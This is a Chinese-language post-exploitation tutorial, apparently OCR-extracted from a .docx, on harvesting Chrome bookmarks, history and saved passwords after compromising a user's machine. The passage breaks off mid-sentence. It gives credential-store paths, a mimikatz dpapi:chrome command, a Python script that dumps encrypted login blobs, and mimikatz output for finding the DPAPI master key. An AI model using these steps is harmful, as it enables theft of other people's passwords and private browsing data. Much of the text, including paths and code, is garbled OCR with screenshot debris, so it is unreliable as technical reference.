2024获取浏览器相关敏感信息.docx

获取浏览器相关敏感信息当我们获取特定用户的计算机权限后，为了深入分析目标的业务逻辑（浏览器访问行为），从而定位我们感兴趣数据或系统的位置，可以尝试收集该用户常用浏览器的访问书签、访问记录、cookie、保存的密码等敏感信息。0x00获取ChrOme浏览器保存的敏感信息OxOOa获取书签信息chrome浏览器的用书签保存在"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultBookmarks",该文件为json格式的文本文件，通过分析用户的书签，可以确定用户常访问的网站，从而找到可能存在关键数据的网站系统。本文均以test用户为例进行讨论OxOOb获取访问记录ChrOme浏览器的用户访问记录保存在"C:UserstestAppData1.ocalGoogleChromeUserDataHefauKHistory"的UrIS表中，该文件为SQlJte数据库文件，可以使用SQliteStiJdio打开直看。ASQUteStMdio(3.3.J)EurH(>to<y)0MAb>seStaictureVwTOeUHdp0A1ouF-XZ三OC三MW9X3。tB的累触发23IO1.V1Hi*tey(SQUteJ)2，T皿”(12)CrHviwFcrwi<BQ-OOOQQiQO.MXM帆IX3T.Ttlr<nIyiU'匚M*tAt.M4ttt4M>广¼v*14sUvltitleI1ChgmesoUCSDN-WlbTR*t三ft>1typ4a,catAtl*twvisatwtiaHidiM013266137266724072>匚3mloU«,aic«t22h*tpspasspo<tC5dn*t.CSDN皿ITBWtl13U1013266137266724072，4*ttlU.vl.4Uiks>匚knr1.r<k.tr33hpbdu,com怜帖设>悟金44hctpsvww.b*idu<on423132661510674458111132661犯达1650667>1.55tppMpoftcdnzwVH>A三三401326613753eS42C0066ht*mw.b>duxort.burp4ue<SP)S停止.三511W10132661M9M872071?7kctpswww.bdu<ons?.burp9uhe，工.国Ett10132661溺70042750广bhZZlkptZM.thftbook.da1113266146203147013>QViHMW99hetp1,threatbook.crv5/.-IXW2013266131W60117>E>ft>tE1010hnptJMhrtbookWvR一i三11亍In11ktp$y/27.152.ia5.l20/403Forbidden11013266146212491«8311326614625O16M261212EgUB笈电至同安全!M*.河晦至31U2661¼2921OM7可以使用上网行为分析工具对'C:UserstestAppData1.ocalGoogleChromeUserDatamefauRHistory”文件进行分析,研究用户的浏览器使用规律、常访问网站等言息，从而找到可能存在关键数据的网站系统、制定针对该用户的进一步分析利用方案。页面访问停留总时间排名编号停留时间网页地址1250小时2250小时https：/thunlpGNNPapers3230小时https:/juejin.impost5a672Ibd5125733201c4a24180小时https：/5170小时https：/6170小时7160小时140小时9140小时https:/arxiv.org/abs/1809.0567910130小时https：/11130小时http:/39.106.118.77/12120小时.-.-OxOOc获取保存的密码ChrOme浏览器会将用户保存的密码储存在"C:UserstestAppData1.ocalGoogleChromeUserDataXDefauItX1.oginData"的IoginS表中，该文件为SQ1.ite数据库文件，可以使用SQIiteStUdiO打开查看。SQUieSiudbo(MJ)1109mDMfQtebm>wcr100kPaSSWOr(1.VaIUe字段即为用户保存密码的密文，ChrOme浏览器不同版本的浏览器对应的加密方式不同。在80之前的版本，密码使用DPAPI加密；在80.x之后的版本,使用AES-256-GCM进行加密。也可以通过密文格式来判断加密方式，如果密文以“v10”或“v1T为前缀，则代表对应的加密方式为AES-256GCM.80.x之前在线获取密码可以使用神器mimikatz获取Chrome浏览器保存的密码，需要以test用户权限执行命令：mimikatz.exelogdpapi:chrome/in:"C:UserstestAppData1.ocalGoogleChromeUserDataDefaultMoginData"/unprotectexit80.X之前离线获取密码ChrOme储存的明文密码时使用WindoWS提供的DPAPI进行对称加密来保证安全性。加解密的密钥称为masterkey有目标用户明文密码的情况首先我们需要定位解密ChrOme数据库对应的MaSterKey文件。使用Python脚本读取1.OginData并保存到文件中，代码如下：fromosimportgetenvimportsqlite3importbinasciiconn=sqlite3.connect("1.oginData")cursor=conn.cursor()cursor.execute('SE1.ECTaction-url,username_value,password_valueFROMlogins,)forresultincursor.fetchall():print(binascii.b2a_hex(result2)f=open('test.txt,wb,)f.write(result2)f.close()脚本执行后，提取1.oginData中保存的密文，保存为test.txt获得该密文对应的MaSterKeyfile,mimikatz命令如下：mimikatz.exedpapi:blob/in:test.t×texit获彳导又寸应guidMasterkey为alllb0f6-b4d7-40c8-b536-672a8288b958mimikatzttdpapi:blot)/in:c:ltest.txt*B1.OB*dwVersion00000001-1guidProviderdf9d8cd0-1501-lldl-8c7a-00c04fc297eb)dwMasterKeyVersion00000001-1guidMasterKealllb0f6-b4d7-40c8-b536-672a8288b958)dwFlags00000000-0()dwDescription1.en00000002-2SzDescriptionalgCrpt00006610-26128(CA1.G_AES_256)%dwAlgCrypt1.en00010-256dwSalt1.en00000020-32pbSaltC5b242bce8a08ba6e83376b0120fa28e88430a2ccd5e58e3f30665bd0900ebadwHmacKey1.en00000000-0pbHmackKeyalgHash0000800e-32782(CR1.G_SHA_512)dwAlgHash1.en00000200-512dwHmac2Ke1.en00000020-32PbHmdCk2Keyadfc4f753f2flf61dfe6042907dl0937e7db4abfeb407cabfa64f67192a8b95dwData1.en00000010-16pbData790249db2e4a74f755c44a27b5f39f2adwSign1.en00000040-64pbSign6efflc8bd30fl8600b3944e9ba8d31b7512155aea77ad3d4f5f76ec7Cd60535ce4eaeb5ac0b7d53ab99f98b04621ae56f5a6766709a293077730365fb7c05ef即MaSterKeyfile的路径为%APPDATA%MicrosoftProtect%SID%alllb0f6-b4d740c8-b536-672a8288b958MaSterKey保存在MaSterKeyfiie中，使用用户密码的SHAl密文加密（NT1.MhaSh使用MD4力口密），所以获取到用户的NT1.Mhash并不能解密MaSterKeyfile获取MaSterKey。在获取目标用户明文密码的情况下可以使用ChromePaSS离线获取Chrorne保存的密码C解密需要获得三部分内容：1 .加密密钥（即MaSterKey文件），位于appdata%MicrosoftProtect下对应Sid文件夹下的文件2 .数据库文件1.OginData（"C:UserstestAppData1.ocalGoogleChromeUserDataXDefauItX1.og